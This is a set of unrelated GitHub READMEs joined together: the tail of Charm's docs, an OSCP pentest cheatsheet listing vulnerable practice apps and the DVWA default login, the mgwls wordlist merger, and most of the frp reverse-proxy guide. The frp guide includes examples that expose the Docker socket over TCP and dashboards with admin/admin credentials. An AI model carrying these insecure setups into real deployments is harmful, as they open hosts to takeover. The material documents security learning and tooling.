Cloud.</p> </details> <details> <summary>Is it possible to not have a local copy of the database?</summary> <p>No. Skate uses BadgerDB and keeps a local copy of the key-value store. The local databases are synced through the Charm Cloud.</p> </details> For more on Charm FS see [the Charm FS docs][fs]. ## Charm Crypt All data sent to a Charm server is fully encrypted on the client. Charm Crypt provides methods for easily encrypting and decrypting data for a Charm user. All key management and account linking is handled seamlessly by Charm. For more on Charm Crypt see [the Charm Crypt docs][crypt]. ## Charm Accounts The best part of Charm accounts is that both you and your users don’t need to think about them. Charm authentication is based on SSH keys, so account creation and authentication is built into all Charm tools and is invisible and frictionless. If a user already has Charm keys, we authenticate with them. If not, we create new ones. Users can also easily link multiple machines to their account, and linked machines will seamlessly gain access to their owners Charm data. Of course, users can revoke machines’ access too. ### Backups You can use `charm backup-keys` to backup your account keys. Your account can be recovered using `charm import-keys charm-keys-backup.tar` ## Charm Client The [`charm`][releases] binary also includes easy access to a lot of the functionality available in the libraries. This could be useful in scripts, as a standalone utility or when testing functionality. ```bash # Link a machine to your Charm account charm link # Set a value charm kv set weather humid # Print out a tree of your files charm fs tree / # Encrypt something charm crypt encrypt < secretphoto.jpg > encrypted.jpg.json # For more info charm help ``` ### Client Settings The Charm client can be configured using environment variables. These are the defaults: * `CHARM_HOST`: Server public URL (_default cloud.charm.sh_) * `CHARM_SSH_PORT`: SSH port to connect to (_default 35353_) * `CHARM_HTTP_PORT`: HTTP port to connect to (_default 35354_) * `CHARM_DEBUG`: Whether debugging logs are enabled (_default false_) * `CHARM_LOGFILE`: The file path to output debug logs * `CHARM_KEY_TYPE`: The type of key to create for new users (_default ed25519_) * `CHARM_DATA_DIR`: The path to where the user data is stored * `CHARM_IDENTITY_KEY`: The path to the identity key used for auth ## Self-Hosting Charm libraries point at our Charmbracelet, Inc. servers by default (that’s cloud.charm.sh), however it's very easy for users to host their own Charm instances. The `charm` binary is a single, statically-linked executable capable of serving an entire Charm instance: ```bash charm serve ``` ### Server settings The Charm server can be configured using environment variables. These are the defaults: * `CHARM_SERVER_BIND_ADDRESS`: Network interface to listen to (_default 0.0.0.0_) * `CHARM_SERVER_HOST`: Hostname to advertise (_default localhost_) * `CHARM_SERVER_SSH_PORT`: SSH server port to listen to (_default 35353_) * `CHARM_SERVER_HTTP_PORT`: HTTP server port to listen to (_default 35354_) * `CHARM_SERVER_STATS_PORT`: Stats server port to listen to (_default 35355_) * `CHARM_SERVER_HEALTH_PORT`: Health server port to listen to (_default 35356_) * `CHARM_SERVER_DATA_DIR`: Server data directory (_default ./data_) * `CHARM_SERVER_USE_TLS`: Whether to use TLS (_default false_) * `CHARM_SERVER_TLS_KEY_FILE`: The TLS key file path to use * `CHARM_SERVER_TLS_CERT_FILE`: The TLS cert file path to use * `CHARM_SERVER_PUBLIC_URL`: Server public URL, useful when hosting the Charm server behind a TLS enabled reverse proxy * `CHARM_SERVER_ENABLE_METRICS`: Whether to enable collecting Prometheus metrics (_default false_) Metrics can be accessed from `http://<CHARM_SERVER_HOST>:<CHARM_SERVER_STATS_PORT>/metrics` * `CHARM_SERVER_USER_MAX_STORAGE`: Maximum FS storage for a user (_default 0_) Zero means no limit To change hosts, users can set `CHARM_HOST` to the domain or IP of their choosing: ```bash export CHARM_HOST=burrito.example.com ``` See instructions for [Systemd](https://github.com/charmbracelet/charm/blob/main/systemd.md) and [Docker](https://github.com/charmbracelet/charm/blob/main/docker.md). #### Storage Considerations The max data you can store on our Charm Cloud servers is 1GB per account. By default, self-hosted servers don't have a data storage limit. Should you want to set a max storage limit on your server, you can do so using `CHARM_SERVER_USER_MAX_STORAGE` ### TLS To set up TLS, you should set `CHARM_SERVER_USE_TLS` to `true`, and specify `CHARM_SERVER_HOST`, `CHARM_SERVER_TLS_KEY_FILE`, and `CHARM_SERVER_TLS_CERT_FILE` file paths. ## Projects using Charm * [Glow][glow]: Render markdown on the CLI, with pizzazz! 💅🏻 * [Skate][skate]: A personal key-value store 🛼 * Your app here! [Let us know what you build](https://twitter.com/charmcli) ## Feedback We’d love to hear your thoughts on this project. Feel free to drop us a note! * [Twitter](https://twitter.com/charmcli) * [The Fediverse](https://mastodon.technology/@charm) * [Slack](https://charm.sh/slack) ## License [MIT](https://github.com/charmbracelet/charm/raw/main/LICENSE) *** Part of [Charm](https://charm.sh). <a href="https://charm.sh/"><img alt="the Charm logo" src="https://stuff.charm.sh/charm-badge.jpg" width="400"></a> Charm热爱开源 • Charm loves open source [releases]: https://github.com/charmbracelet/charm/releases [docs]: https://pkg.go.dev/github.com/charmbracelet/charm?tab=doc [kv]: https://github.com/charmbracelet/charm/tree/main/kv [fs]: https://github.com/charmbracelet/charm/tree/main/fs [crypt]: https://github.com/charmbracelet/charm/tree/main/crypt [glow]: https://github.com/charmbracelet/glow [skate]: https://github.com/charmbracelet/skate [badger]: https://github.com/dgraph-io/badger
# oscp * This is my cheatsheet and scripts developed while taking the Offensive Security Penetration Testing with Kali Linux course. * [Cheat Sheet](https://github.com/so87/OSCP-PwK/blob/master/Penetration%20Testing%20Tools.docx) ## docker container for portability * kali-build contains the files necessary for running the essential kali linux tools in a docker container. * it is recommended that you install burp suite on your host OS along with firefox. * tools like "gobuster" can be proxied through hostOS burp proxy via "http://host.docker.internal:8080" * host.docker.internal is the hostname you use if you want to scan your own localhost machine ## web pentesting * [List of vulnerable practice applications](https://owasp.org/www-project-vulnerable-web-applications-directory/) * PHP: * docker run --rm -p 10000:80 gjuniioor/owasp-bricks * docker run --rm -it -p 10000:80 vulnerables/web-dvwa:latest * admin:password * Java: docker run --rm -p 127.0.0.1:10000:8080 -p 127.0.0.1:10001:9090 webgoat/goatandwolf * WebGoat will be located at: http://127.0.0.1:10000/WebGoat * WebWolf will be located at: http://127.0.0.1:10001/WebWolf * NodeJS: * docker run --rm --name dvna -p 10000:9090 -d appsecco/dvna:sqlite * docker run --rm -p 10000:3000 bkimminich/juice-shop * rails: docker run --rm -p 10000:3000 contrastsecuritydemo/railsgoat:1.0 * Python/Django/API: docker container run -it --rm -p 10000:8000 tuxotron/tiredful-api * web socket: docker run --rm -p 10000:80 -p 10080:8080 tssoffsec/dvws ## Building yourself a practice area and learning I recommend you go on over to my [home lab notes](https://github.com/so87/Home-Lab) if you want to practice all of this yourself. I also have [several great links for learning](https://github.com/so87/Links-for-Network-Security) these types of concepts.
<h1 align="center">mgwls <a href="https://twitter.com/intent/tweet?text=mgwls%20-%20Combine%20words%20from%20two%20wordlist%20files%20and%20concatenate%20them%20with%20an%20optional%20delimiter%20%40trick3st%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fmgwls&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">Merge wordlists</h3> ![mgwls](mgwls.png "mgwls") Combine words from two wordlist files and concatenate them with an optional delimiter # Installation ## Binary Binaries are available in the [latest release](https://github.com/trickest/mgwls/releases/latest). ## Docker ``` docker run quay.io/trickest/mgwls ``` ## From source ``` go install github.com/trickest/mgwls@latest ``` # Usage ``` -delimiter string String delimiter to place between words -l string Wordlist file (left side) -side Flag that determines the side of the single word -o string Output file (optional) -r string Wordlist file (right side) -w string Single word to use for concatenation ``` ### Examples ##### left.txt ``` 1 2 3 ``` ##### right.txt ``` a b c ``` ```shell script > mgwls -l left.txt -r right.txt -delimiter "_" 1_a 1_b 1_c 2_a 2_b 2_c 3_a 3_b 3_c ``` ```shell script > mgwls -l left.txt -w foo -side right 1foo 2foo 3foo ``` # Report Bugs / Feedback We look forward to any feedback you want to share with us or if you're stuck with a problem you can contact us at [[email protected]](mailto:[email protected]). You can also create an [Issue](https://github.com/trickest/mgwls/issues/new) or pull request on the Github repository. # Where does this fit in your methodology? Mgwls is an integral part of many workflows in the Trickest store. Sign up on [trickest.com](https://trickest.com) to get access to these workflows or build your own from scratch! [<img src="./banner.png" />](https://trickest-access.paperform.co/)
# frp [![Build Status](https://circleci.com/gh/fatedier/frp.svg?style=shield)](https://circleci.com/gh/fatedier/frp) [![GitHub release](https://img.shields.io/github/tag/fatedier/frp.svg?label=release)](https://github.com/fatedier/frp/releases) [README](README.md) | [中文文档](README_zh.md) <h3 align="center">Gold Sponsors</h3> <!--gold sponsors start--> <p align="center"> <a href="https://workos.com/?utm_campaign=github_repo&utm_medium=referral&utm_content=frp&utm_source=github" target="_blank"> <img width="350px" src="https://raw.githubusercontent.com/fatedier/frp/dev/doc/pic/sponsor_workos.png"> </a> </p> <!--gold sponsors end--> ## What is frp? frp is a fast reverse proxy that allows you to expose a local server located behind a NAT or firewall to the Internet. It currently supports **TCP** and **UDP**, as well as **HTTP** and **HTTPS** protocols, enabling requests to be forwarded to internal services via domain name. frp also offers a P2P connect mode. ## Table of Contents <!-- vim-markdown-toc GFM --> * [Development Status](#development-status) * [About V2](#about-v2) * [Architecture](#architecture) * [Example Usage](#example-usage) * [Access your computer in a LAN network via SSH](#access-your-computer-in-a-lan-network-via-ssh) * [Multiple SSH services sharing the same port](#multiple-ssh-services-sharing-the-same-port) * [Accessing Internal Web Services with Custom Domains in LAN](#accessing-internal-web-services-with-custom-domains-in-lan) * [Forward DNS query requests](#forward-dns-query-requests) * [Forward Unix Domain Socket](#forward-unix-domain-socket) * [Expose a simple HTTP file server](#expose-a-simple-http-file-server) * [Enable HTTPS for a local HTTP(S) service](#enable-https-for-a-local-https-service) * [Expose your service privately](#expose-your-service-privately) * [P2P Mode](#p2p-mode) * [Features](#features) * [Configuration Files](#configuration-files) * [Using Environment Variables](#using-environment-variables) * [Split Configures Into Different Files](#split-configures-into-different-files) * [Dashboard](#dashboard) * [Admin UI](#admin-ui) * [Monitor](#monitor) * [Prometheus](#prometheus) * [Authenticating the Client](#authenticating-the-client) * [Token Authentication](#token-authentication) * [OIDC Authentication](#oidc-authentication) * [Encryption and Compression](#encryption-and-compression) * [TLS](#tls) * [Hot-Reloading frpc configuration](#hot-reloading-frpc-configuration) * [Get proxy status from client](#get-proxy-status-from-client) * [Only allowing certain ports on the server](#only-allowing-certain-ports-on-the-server) * [Port Reuse](#port-reuse) * [Bandwidth Limit](#bandwidth-limit) * [For Each Proxy](#for-each-proxy) * [TCP Stream Multiplexing](#tcp-stream-multiplexing) * [Support KCP Protocol](#support-kcp-protocol) * [Support QUIC Protocol](#support-quic-protocol) * [Connection Pooling](#connection-pooling) * [Load balancing](#load-balancing) * [Service Health Check](#service-health-check) * [Rewriting the HTTP Host Header](#rewriting-the-http-host-header) * [Setting other HTTP Headers](#setting-other-http-headers) * [Get Real IP](#get-real-ip) * [HTTP X-Forwarded-For](#http-x-forwarded-for) * [Proxy Protocol](#proxy-protocol) * [Require HTTP Basic Auth (Password) for Web Services](#require-http-basic-auth-password-for-web-services) * [Custom Subdomain Names](#custom-subdomain-names) * [URL Routing](#url-routing) * [TCP Port Multiplexing](#tcp-port-multiplexing) * [Connecting to frps via HTTP PROXY](#connecting-to-frps-via-http-proxy) * [Range ports mapping](#range-ports-mapping) * [Client Plugins](#client-plugins) * [Server Manage Plugins](#server-manage-plugins) * [Development Plan](#development-plan) * [Contributing](#contributing) * [Donation](#donation) * [GitHub Sponsors](#github-sponsors) * [PayPal](#paypal) <!-- vim-markdown-toc --> ## Development Status frp is currently under development. You can try the latest release version in the `master` branch, or use the `dev` branch to access the version currently in development. We are currently working on version 2 and attempting to perform some code refactoring and improvements. However, please note that it will not be compatible with version 1. We will transition from version 0 to version 1 at the appropriate time and will only accept bug fixes and improvements, rather than big feature requests. ### About V2 The overall situation is currently unfavorable, and there is significant pressure in both personal and professional aspects. The complexity and difficulty of the v2 version are much higher than anticipated. I can only work on its development during fragmented time periods, and the constant interruptions disrupt productivity significantly. Given this situation, we will continue to optimize and iterate on the current version until we have more free time to proceed with the major version overhaul. The concept behind v2 is based on my years of experience and reflection in the cloud-native domain, particularly in K8s and ServiceMesh. Its core is a modernized four-layer and seven-layer proxy, similar to envoy. This proxy itself is highly scalable, not only capable of implementing the functionality of intranet penetration but also applicable to various other domains. Building upon this highly scalable core, we aim to implement all the capabilities of frp v1 while also addressing the functionalities that were previously unachievable or difficult to implement in an elegant manner. Furthermore, we will maintain efficient development and iteration capabilities. In addition, I envision frp itself becoming a highly extensible system and platform, similar to how we can provide a range of extension capabilities based on K8s. In K8s, we can customize development according to enterprise needs, utilizing features such as CRD, controller mode, webhook, CSI, and CNI. In frp v1, we introduced the concept of server plugins, which implemented some basic extensibility. However, it relies on a simple HTTP protocol and requires users to start independent processes and manage them on their own. This approach is far from flexible and convenient, and real-world demands vary greatly. It is unrealistic to expect a non-profit open-source project maintained by a few individuals to meet everyone's needs. Finally, we acknowledge that the current design of modules such as configuration management, permission verification, certificate management, and API management is not modern enough. While we may carry out some optimizations in the v1 version, ensuring compatibility remains a challenging issue that requires a considerable amount of effort to address. We sincerely appreciate your support for frp. ## Architecture ![architecture](/doc/pic/architecture.png) ## Example Usage To begin, download the latest program for your operating system and architecture from the [Release](https://github.com/fatedier/frp/releases) page. Next, place the `frps` binary and `frps.ini` configuration file on Server A, which has a public IP address. Finally, place the `frpc` binary and `frpc.ini` configuration file on Server B, which is located on a LAN that cannot be directly accessed from the public internet. ### Access your computer in a LAN network via SSH 1. Modify `frps.ini` on server A by setting the `bind_port` for frp clients to connect to: ```ini # frps.ini [common] bind_port = 7000 ``` 2. Start `frps` on server A: `./frps -c ./frps.ini` 3. Modify `frpc.ini` on server B and set the `server_addr` field to the public IP address of your frps server: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 ``` Note that the `local_port` (listened on the client) and `remote_port` (exposed on the server) are used for traffic going in and out of the frp system, while the `server_port` is used for communication between frps and frpc. 4. Start `frpc` on server B: `./frpc -c ./frpc.ini` 5. To access server B from another machine through server A via SSH (assuming the username is `test`), use the following command: `ssh -oPort=6000 [email protected]` ### Multiple SSH services sharing the same port This example implements multiple SSH services exposed through the same port using a proxy of type tcpmux. Similarly, as long as the client supports the HTTP Connect proxy connection method, port reuse can be achieved in this way. 1. Deploy frps on a machine with a public IP and modify the frps.ini file. Here is a simplified configuration: ```ini [common] bind_port = 7000 tcpmux_httpconnect_port = 5002 ``` 2. Deploy frpc on the internal machine A with the following configuration: ```ini [common] server_addr = x.x.x.x server_port = 7000 [ssh1] type = tcpmux multiplexer = httpconnect custom_domains = machine-a.example.com local_ip = 127.0.0.1 local_port = 22 ``` 3. Deploy another frpc on the internal machine B with the following configuration: ```ini [common] server_addr = x.x.x.x server_port = 7000 [ssh2] type = tcpmux multiplexer = httpconnect custom_domains = machine-b.example.com local_ip = 127.0.0.1 local_port = 22 ``` 4. To access internal machine A using SSH ProxyCommand, assuming the username is "test": `ssh -o 'proxycommand socat - PROXY:x.x.x.x:machine-a.example.com:22,proxyport=5002' test@machine-a` 5. To access internal machine B, the only difference is the domain name, assuming the username is "test": `ssh -o 'proxycommand socat - PROXY:x.x.x.x:machine-b.example.com:22,proxyport=5002' test@machine-b` ### Accessing Internal Web Services with Custom Domains in LAN Sometimes we need to expose a local web service behind a NAT network to others for testing purposes with our own domain name. Unfortunately, we cannot resolve a domain name to a local IP. However, we can use frp to expose an HTTP(S) service. 1. Modify `frps.ini` and set the HTTP port for vhost to 8080: ```ini # frps.ini [common] bind_port = 7000 vhost_http_port = 8080 ``` If you want to configure an https proxy, you need to set up the `vhost_https_port`. 2. Start `frps`: `./frps -c ./frps.ini` 3. Modify `frpc.ini` and set `server_addr` to the IP address of the remote frps server. Specify the `local_port` of your web service: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [web] type = http local_port = 80 custom_domains = www.example.com ``` 4. Start `frpc`: `./frpc -c ./frpc.ini` 5. Map the A record of `www.example.com` to either the public IP of the remote frps server or a CNAME record pointing to your original domain. 6. Visit your local web service using url `http://www.example.com:8080`. ### Forward DNS query requests 1. Modify `frps.ini`: ```ini # frps.ini [common] bind_port = 7000 ``` 2. Start `frps`: `./frps -c ./frps.ini` 3. Modify `frpc.ini` and set `server_addr` to the IP address of the remote frps server. Forward DNS query requests to the Google Public DNS server `8.8.8.8:53`: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [dns] type = udp local_ip = 8.8.8.8 local_port = 53 remote_port = 6000 ``` 4. Start frpc: `./frpc -c ./frpc.ini` 5. Test DNS resolution using the `dig` command: `dig @x.x.x.x -p 6000 www.google.com` ### Forward Unix Domain Socket Expose a Unix domain socket (e.g. the Docker daemon socket) as TCP. Configure `frps` as above. 1. Start `frpc` with the following configuration: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [unix_domain_socket] type = tcp remote_port = 6000 plugin = unix_domain_socket plugin_unix_path = /var/run/docker.sock ``` 2. Test the configuration by getting the docker version using `curl`: `curl http://x.x.x.x:6000/version` ### Expose a simple HTTP file server Expose a simple HTTP file server to access files stored in the LAN from the public Internet. Configure `frps` as described above, then: 1. Start `frpc` with the following configuration: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [test_static_file] type = tcp remote_port = 6000 plugin = static_file plugin_local_path = /tmp/files plugin_strip_prefix = static plugin_http_user = abc plugin_http_passwd = abc ``` 2. Visit `http://x.x.x.x:6000/static/` from your browser and specify correct username and password to view files in `/tmp/files` on the `frpc` machine. ### Enable HTTPS for a local HTTP(S) service You may substitute `https2https` for the plugin, and point the `plugin_local_addr` to a HTTPS endpoint. 1. Start `frpc` with the following configuration: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 vhost_https_port = 443 [test_https2http] type = https custom_domains = test.example.com plugin = https2http plugin_local_addr = 127.0.0.1:80 plugin_crt_path = ./server.crt plugin_key_path = ./server.key plugin_host_header_rewrite = 127.0.0.1 plugin_header_X-From-Where = frp ``` 2. Visit `https://test.example.com`. ### Expose your service privately To mitigate risks associated with exposing certain services directly to the public network, STCP (Secret TCP) mode requires a preshared key to be used for access to the service from other clients. Configure `frps` same as above. 1. Start `frpc` on machine B with the following config. This example is for exposing the SSH service (port 22), and note the `sk` field for the preshared key, and that the `remote_port` field is removed here: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [secret_ssh] type = stcp sk = abcdefg local_ip = 127.0.0.1 local_port = 22 ``` 2. Start another `frpc` (typically on another machine C) with the following config to access the SSH service with a security key (`sk` field): ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [secret_ssh_visitor] type = stcp role = visitor server_name = secret_ssh sk = abcdefg bind_addr = 127.0.0.1 bind_port = 6000 ``` 3. On machine C, connect to SSH on machine B, using this command: `ssh -oPort=6000 127.0.0.1` ### P2P Mode **xtcp** is designed to transmit large amounts of data directly between clients. A frps server is still needed, as P2P here only refers to the actual data transmission. Note that it may not work with all types of NAT devices. You might want to fallback to stcp if xtcp doesn't work. 1. Start `frpc` on machine B, and expose the SSH port. Note that the `remote_port` field is removed: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 # set up a new stun server if the default one is not available. # nat_hole_stun_server = xxx [p2p_ssh] type = xtcp sk = abcdefg local_ip = 127.0.0.1 local_port = 22 ``` 2. Start another `frpc` (typically on another machine C) with the configuration to connect to SSH using P2P mode: ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 # set up a new stun server if the default one is not available. # nat_hole_stun_server = xxx [p2p_ssh_visitor] type = xtcp role = visitor server_name = p2p_ssh sk = abcdefg bind_addr = 127.0.0.1 bind_port = 6000 # when automatic tunnel persistence is required, set it to true keep_tunnel_open = false ``` 3. On machine C, connect to SSH on machine B, using this command: `ssh -oPort=6000 127.0.0.1` ## Features ### Configuration Files Read the full example configuration files to find out even more features not described here. [Full configuration file for frps (Server)](./conf/frps_full.ini) [Full configuration file for frpc (Client)](./conf/frpc_full.ini) ### Using Environment Variables Environment variables can be referenced in the configuration file, using Go's standard format: ```ini # frpc.ini [common] server_addr = {{ .Envs.FRP_SERVER_ADDR }} server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = {{ .Envs.FRP_SSH_REMOTE_PORT }} ``` With the config above, variables can be passed into `frpc` program like this: ``` export FRP_SERVER_ADDR="x.x.x.x" export FRP_SSH_REMOTE_PORT="6000" ./frpc -c ./frpc.ini ``` `frpc` will render configuration file template using OS environment variables. Remember to prefix your reference with `.Envs`. ### Split Configures Into Different Files You can split multiple proxy configs into different files and include them in the main file. ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 includes=./confd/*.ini ``` ```ini # ./confd/test.ini [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 ``` ### Dashboard Check frp's status and proxies' statistics information by Dashboard. Configure a port for dashboard to enable this feature: ```ini [common] dashboard_port = 7500 # dashboard's username and password are both optional dashboard_user = admin dashboard_pwd = admin ``` Then visit `http://[server_addr]:7500` to see the dashboard, with username and password both being `admin`. Additionally, you can use HTTPS port by using your domains wildcard or normal SSL certificate: ```ini [common] dashboard_port = 7500 # dashboard's username and password are both optional dashboard_user = admin dashboard_pwd = admin dashboard_tls_mode = true dashboard_tls_cert_file = server.crt dashboard_tls_key_file = server.key ``` Then visit `https://[server_addr]:7500` to see the dashboard in secure HTTPS connection, with username and password both being `admin`. ![dashboard](/doc/pic/dashboard.png) ### Admin UI The Admin UI helps you check and manage frpc's configuration. Configure an address for admin UI to enable this feature: ```ini [common] admin_addr = 127.0.0.1 admin_port = 7400 admin_user = admin admin_pwd = admin ``` Then visit `http://127.0.0.1:7400` to see admin UI, with username and password both being `admin`. ### Monitor When dashboard is enabled, frps will save monitor data in cache. It will be cleared after process restart. Prometheus is also supported. #### Prometheus Enable dashboard first, then configure `enable_prometheus = true` in `frps.ini`. `http://{dashboard_addr}/metrics` will provide prometheus monitor data. ### Authenticating the Client There are 2 authentication methods to authenticate frpc with frps. You can decide which one to use by configuring `authentication_method` under `[common]` in `frpc.ini` and `frps.ini`. Configuring `authenticate_heartbeats = true` under `[common]` will use the configured authentication method to add and validate authentication on every heartbeat between frpc and frps. Configuring `authenticate_new_work_conns = true` under `[common]` will do the same for every new work connection between frpc and frps. #### Token Authentication When specifying `authentication_method = token` under `[common]` in `frpc.ini` and `frps.ini` - token based authentication will be used. Make sure to specify the same `token` in the `[common]` section in `frps.ini` and `frpc.ini` for frpc to pass frps validation #### OIDC Authentication When specifying `authentication_method = oidc` under `[common]` in `frpc.ini` and `frps.ini` - OIDC based authentication will be used. OIDC stands for OpenID Connect, and the flow used is called [Client Credentials Grant](https://tools.ietf.org/html/rfc6749#section-4.4). To use this authentication type - configure `frpc.ini` and `frps.ini` as follows: ```ini # frps.ini [common] authentication_method = oidc oidc_issuer = https://example-oidc-issuer.com/ oidc_audience = https://oidc-audience.com/.default ``` ```ini # frpc.ini [common] authentication_method = oidc oidc_client_id = 98692467-37de-409a-9fac-bb2585826f18 # Replace with OIDC client ID oidc_client_secret = oidc_secret oidc_audience = https://oidc-audience.com/.default oidc_token_endpoint_url = https://example-oidc-endpoint.com/oauth2/v2.0/token ``` ### Encryption and Compression The features are off by default. You can turn on encryption and/or compression: ```ini # frpc.ini [ssh] type = tcp local_port = 22 remote_port = 6000 use_encryption = true use_compression = true ``` #### TLS Since v0.50.0, the default value of `tls_enable` and `disable_custom_tls_first_byte` has been changed to true, and tls is enabled by default. For port multiplexing, frp sends a first byte `0x17` to dial a TLS connection. This only takes effect when you set `disable_custom_tls_first_byte` to false. To **enforce** `frps` to only accept TLS connections - configure `tls_only = true` in the `[common]` section in `frps.ini`. **This is optional.** **`frpc` TLS settings (under the `[common]` section):** ```ini tls_enable = true tls_cert_file = certificate.crt tls_key_file = certificate.key tls_trusted_ca_file = ca.crt ``` **`frps` TLS settings (under the `[common]` section):** ```ini tls_only = true tls_cert_file = certificate.crt tls_key_file = certificate.key tls_trusted_ca_file = ca.crt ``` You will need **a root CA cert** and **at least one SSL/TLS certificate**. It **can** be self-signed or regular (such as Let's Encrypt or another SSL/TLS certificate provider). If you using `frp` via IP address and not hostname, make sure to set the appropriate IP address in the Subject Alternative Name (SAN) area when generating SSL/TLS Certificates. Given an example: * Prepare openssl config file. It exists at `/etc/pki/tls/openssl.cnf` in Linux System and `/System/Library/OpenSSL/openssl.cnf` in MacOS, and you can copy it to current path, like `cp /etc/pki/tls/openssl.cnf ./my-openssl.cnf`. If not, you can build it by yourself, like: ``` cat > my-openssl.cnf << EOF [ ca ] default_ca = CA_default [ CA_default ] x509_extensions = usr_cert [ req ] default_bits = 2048 default_md = sha256 default_keyfile = privkey.pem distinguished_name = req_distinguished_name attributes = req_attributes x509_extensions = v3_ca string_mask = utf8only [ req_distinguished_name ] [ req_attributes ] [ usr_cert ] basicConstraints = CA:FALSE nsComment = "OpenSSL Generated Certificate" subjectKeyIdentifier = hash authorityKeyIdentifier = keyid,issuer [ v3_ca ] subjectKeyIdentifier = hash authorityKeyIdentifier = keyid:always,issuer basicConstraints = CA:true EOF ``` * build ca certificates: ``` openssl genrsa -out ca.key 2048 openssl req -x509 -new -nodes -key ca.key -subj "/CN=example.ca.com" -days 5000 -out ca.crt ``` * build frps certificates: ``` openssl genrsa -out server.key 2048 openssl req -new -sha256 -key server.key \ -subj "/C=XX/ST=DEFAULT/L=DEFAULT/O=DEFAULT/CN=server.com" \ -reqexts SAN \ -config <(cat my-openssl.cnf <(printf "\n[SAN]\nsubjectAltName=DNS:localhost,IP:127.0.0.1,DNS:example.server.com")) \ -out server.csr openssl x509 -req -days 365 -sha256 \ -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial \ -extfile <(printf "subjectAltName=DNS:localhost,IP:127.0.0.1,DNS:example.server.com") \ -out server.crt ``` * build frpc certificates: ``` openssl genrsa -out client.key 2048 openssl req -new -sha256 -key client.key \ -subj "/C=XX/ST=DEFAULT/L=DEFAULT/O=DEFAULT/CN=client.com" \ -reqexts SAN \ -config <(cat my-openssl.cnf <(printf "\n[SAN]\nsubjectAltName=DNS:client.com,DNS:example.client.com")) \ -out client.csr openssl x509 -req -days 365 -sha256 \ -in client.csr -CA ca.crt -CAkey ca.key -CAcreateserial \ -extfile <(printf "subjectAltName=DNS:client.com,DNS:example.client.com") \ -out client.crt ``` ### Hot-Reloading frpc configuration The `admin_addr` and `admin_port` fields are required for enabling HTTP API: ```ini # frpc.ini [common] admin_addr = 127.0.0.1 admin_port = 7400 ``` Then run command `frpc reload -c ./frpc.ini` and wait for about 10 seconds to let `frpc` create or update or remove proxies. **Note that parameters in [common] section won't be modified except 'start'.** You can run command `frpc verify -c ./frpc.ini` before reloading to check if there are config errors. ### Get proxy status from client Use `frpc status -c ./frpc.ini` to get status of all proxies. The `admin_addr` and `admin_port` fields are required for enabling HTTP API. ### Only allowing certain ports on the server `allow_ports` in `frps.ini` is used to avoid abuse of ports: ```ini # frps.ini [common] allow_ports = 2000-3000,3001,3003,4000-50000 ``` `allow_ports` consists of specific ports or port ranges (lowest port number, dash `-`, highest port number), separated by comma `,`. ### Port Reuse `vhost_http_port` and `vhost_https_port` in frps can use same port with `bind_port`. frps will detect the connection's protocol and handle it correspondingly. We would like to try to allow multiple proxies bind a same remote port with different protocols in the future. ### Bandwidth Limit #### For Each Proxy ```ini # frpc.ini [ssh] type = tcp local_port = 22 remote_port = 6000 bandwidth_limit = 1MB ``` Set `bandwidth_limit` in each proxy's configure to enable this feature. Supported units are `MB` and `KB`. Set `bandwidth_limit_mode` to `client` or `server` to limit bandwidth on the client or server side. Default is `client`. ### TCP Stream Multiplexing frp supports tcp stream multiplexing since v0.10.0 like HTTP2 Multiplexing, in which case all logic connections to the same frpc are multiplexed into the same TCP connection. You can disable this feature by modify `frps.ini` and `frpc.ini`: ```ini # frps.ini and frpc.ini, must be same [common] tcp_mux = false ``` ### Support KCP Protocol KCP is a fast and reliable protocol that can achieve the transmission effect of a reduction of the average latency by 30% to 40% and reduction of the maximum delay by a factor of three, at the cost of 10% to 20% more bandwidth wasted than TCP. KCP mode uses UDP as the underlying transport. Using KCP in frp: 1. Enable KCP in frps: ```ini # frps.ini [common] bind_port = 7000 # Specify a UDP port for KCP. kcp_bind_port = 7000 ``` The `kcp_bind_port` number can be the same number as `bind_port`, since `bind_port` field specifies a TCP port. 2. Configure `frpc.ini` to use KCP to connect to frps: ```ini # frpc.ini [common] server_addr = x.x.x.x # Same as the 'kcp_bind_port' in frps.ini server_port = 7000 protocol = kcp ``` ### Support QUIC Protocol QUIC is a new multiplexed transport built on top of UDP. Using QUIC in frp: 1. Enable QUIC in frps: ```ini # frps.ini [common] bind_port = 7000 # Specify a UDP port for QUIC. quic_bind_port = 7000 ``` The `quic_bind_port` number can be the same number as `bind_port`, since `bind_port` field specifies a TCP port. 2. Configure `frpc.ini` to use QUIC to connect to frps: ```ini # frpc.ini [common] server_addr = x.x.x.x # Same as the 'quic_bind_port' in frps.ini server_port = 7000 protocol = quic ``` ### Connection Pooling By default, frps creates a new frpc connection to the backend service upon a user request. With connection pooling, frps keeps a certain number of pre-established connections, reducing the time needed to establish a connection. This feature is suitable for a large number of short connections. 1. Configure the limit of pool count each proxy can use in `frps.ini`: ```ini # frps.ini [common] max_pool_count = 5 ``` 2. Enable and specify the number of connection pool: ```ini # frpc.ini [common] pool_count = 1 ``` ### Load balancing Load balancing is supported by `group`. This feature is only available for types `tcp`, `http`, `tcpmux` now. ```ini # frpc.ini [test1] type = tcp local_port = 8080 remote_port = 80 group = web group_key = 123 [test2] type = tcp local_port = 8081 remote_port = 80 group = web group_key = 123 ``` `group_key` is used for authentication. Connections to port 80 will be dispatched to proxies in the same group randomly. For type `tcp`, `remote_port` in the same group should be the same. For type `http`, `custom_domains`, `subdomain`, `locations` should be the same. ### Service Health Check Health check feature can help you achieve high availability with load balancing. Add 